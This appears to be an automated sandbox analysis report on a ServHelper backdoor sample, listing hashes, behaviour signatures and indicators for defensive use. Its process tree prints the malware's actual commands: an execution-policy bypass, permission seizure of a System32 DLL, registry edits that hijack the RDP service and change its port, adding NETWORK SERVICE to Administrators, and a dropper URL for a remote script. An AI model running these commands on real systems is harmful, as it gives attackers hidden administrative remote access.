servhelper | 2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f

Analysis

max time kernel
121s
max time network
168s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
22-02-2022 11:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe
Size

4.2MB
MD5

470602a8aa144556803374fb94a210aa
SHA1

a04b54e71646fd4f70fec7a24b44932079755f5e
SHA256

2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f
SHA512

24020ea5d03d5b4527d24b7cc531729771e714e180d85fca8b1a8e01211f1e21fb339ffdcd6d04c1df8a1c2414fe281d86039be025ea92c72ffb3325cc1221eb

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 10 IoCs

flow	pid	Process
71	3512	powershell.exe
73	3512	powershell.exe
74	3512	powershell.exe
75	3512	powershell.exe
76	3512	powershell.exe
78	3512	powershell.exe
80	3512	powershell.exe
82	3512	powershell.exe
84	3512	powershell.exe
86	3512	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2124	InstallUtil.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
3872	icacls.exe
2744	icacls.exe
4512	takeown.exe
3852	icacls.exe
2232	icacls.exe
432	icacls.exe
1768	icacls.exe
4132	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000800000001e7cd-169.dat	upx
behavioral2/files/0x000700000001e7ce-170.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
4288	Process not Found
4288	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4512	takeown.exe
3852	icacls.exe
2232	icacls.exe
432	icacls.exe
1768	icacls.exe
4132	icacls.exe
3872	icacls.exe
2744	icacls.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4896 set thread context of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE48C.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE4BC.tmp	powershell.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE50C.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE51D.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_3igexyc4.vmq.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_u5atovjb.tp0.psm1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE4DC.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5056	reg.exe

Runs net.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc	stream
HTTP User-Agent header	75	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	76	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	78	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	73	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	74	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe
4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe
1684	powershell.exe
1684	powershell.exe
3148	powershell.exe
3148	powershell.exe
1856	powershell.exe
1856	powershell.exe
932	powershell.exe
932	powershell.exe
1684	powershell.exe
1684	powershell.exe
1684	powershell.exe
3512	powershell.exe
3512	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
668	Process not Found
668	Process not Found

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe
Token: SeShutdownPrivilege	4452	svchost.exe
Token: SeCreatePagefilePrivilege	4452	svchost.exe
Token: SeShutdownPrivilege	4452	svchost.exe
Token: SeCreatePagefilePrivilege	4452	svchost.exe
Token: SeShutdownPrivilege	4452	svchost.exe
Token: SeCreatePagefilePrivilege	4452	svchost.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	3148	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeRestorePrivilege	2232	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4856	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4856	WMIC.exe
Token: SeAuditPrivilege	4856	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4856	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4856	WMIC.exe
Token: SeAuditPrivilege	4856	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4872	WMIC.exe
Token: SeAuditPrivilege	4872	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4872	WMIC.exe
Token: SeAuditPrivilege	4872	WMIC.exe
Token: SeDebugPrivilege	3512	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88
PID 4896 wrote to memory of 2124	4896	2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe	88
PID 2124 wrote to memory of 1684	2124	InstallUtil.exe	98
PID 2124 wrote to memory of 1684	2124	InstallUtil.exe	98
PID 1684 wrote to memory of 3148	1684	powershell.exe	102
PID 1684 wrote to memory of 3148	1684	powershell.exe	102
PID 1684 wrote to memory of 1856	1684	powershell.exe	105
PID 1684 wrote to memory of 1856	1684	powershell.exe	105
PID 1684 wrote to memory of 932	1684	powershell.exe	107
PID 1684 wrote to memory of 932	1684	powershell.exe	107
PID 1684 wrote to memory of 4512	1684	powershell.exe	109
PID 1684 wrote to memory of 4512	1684	powershell.exe	109
PID 1684 wrote to memory of 3852	1684	powershell.exe	110
PID 1684 wrote to memory of 3852	1684	powershell.exe	110
PID 1684 wrote to memory of 2232	1684	powershell.exe	111
PID 1684 wrote to memory of 2232	1684	powershell.exe	111
PID 1684 wrote to memory of 432	1684	powershell.exe	112
PID 1684 wrote to memory of 432	1684	powershell.exe	112
PID 1684 wrote to memory of 1768	1684	powershell.exe	113
PID 1684 wrote to memory of 1768	1684	powershell.exe	113
PID 1684 wrote to memory of 4132	1684	powershell.exe	114
PID 1684 wrote to memory of 4132	1684	powershell.exe	114
PID 1684 wrote to memory of 3872	1684	powershell.exe	115
PID 1684 wrote to memory of 3872	1684	powershell.exe	115
PID 1684 wrote to memory of 2744	1684	powershell.exe	116
PID 1684 wrote to memory of 2744	1684	powershell.exe	116
PID 1684 wrote to memory of 4900	1684	powershell.exe	117
PID 1684 wrote to memory of 4900	1684	powershell.exe	117
PID 1684 wrote to memory of 5056	1684	powershell.exe	118
PID 1684 wrote to memory of 5056	1684	powershell.exe	118
PID 1684 wrote to memory of 460	1684	powershell.exe	119
PID 1684 wrote to memory of 460	1684	powershell.exe	119
PID 1684 wrote to memory of 4732	1684	powershell.exe	120
PID 1684 wrote to memory of 4732	1684	powershell.exe	120
PID 4732 wrote to memory of 4968	4732	net.exe	121
PID 4732 wrote to memory of 4968	4732	net.exe	121
PID 1684 wrote to memory of 636	1684	powershell.exe	122
PID 1684 wrote to memory of 636	1684	powershell.exe	122
PID 636 wrote to memory of 3572	636	cmd.exe	123
PID 636 wrote to memory of 3572	636	cmd.exe	123
PID 3572 wrote to memory of 4572	3572	cmd.exe	124
PID 3572 wrote to memory of 4572	3572	cmd.exe	124
PID 4572 wrote to memory of 2324	4572	net.exe	125
PID 4572 wrote to memory of 2324	4572	net.exe	125
PID 1684 wrote to memory of 996	1684	powershell.exe	126
PID 1684 wrote to memory of 996	1684	powershell.exe	126
PID 996 wrote to memory of 3452	996	cmd.exe	127
PID 996 wrote to memory of 3452	996	cmd.exe	127
PID 3452 wrote to memory of 1900	3452	cmd.exe	128
PID 3452 wrote to memory of 1900	3452	cmd.exe	128
PID 1900 wrote to memory of 2724	1900	net.exe	129
PID 1900 wrote to memory of 2724	1900	net.exe	129
PID 1628 wrote to memory of 3264	1628	cmd.exe	133
PID 1628 wrote to memory of 3264	1628	cmd.exe	133
PID 3264 wrote to memory of 2520	3264	net.exe	134
PID 3264 wrote to memory of 2520	3264	net.exe	134

C:\Users\Admin\AppData\Local\Temp\2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe
"C:\Users\Admin\AppData\Local\Temp\2355df7559b137125f35cc373a6fe4bd967b91fd207e705868f6d25a1e60003f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
  C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:932
  - - C:\Windows\system32\takeown.exe
      "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4512
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3852
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2232
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:432
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1768
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4132
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3872
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2744
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      4⤵
      PID:4900
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      4⤵
      Modifies registry key
      PID:5056
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      4⤵
      PID:460
  - - C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4732
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        5⤵
        
        PID:4968
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:636
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3572
      - C:\Windows\system32\net.exe
        
        net start rdpdr
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4572
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        7⤵
        
        PID:2324
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:996
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3452
      - C:\Windows\system32\net.exe
        
        net start TermService
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1900
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        7⤵
        
        PID:2724
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      4⤵
      PID:4072
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      4⤵
      PID:2228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:1028

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3264
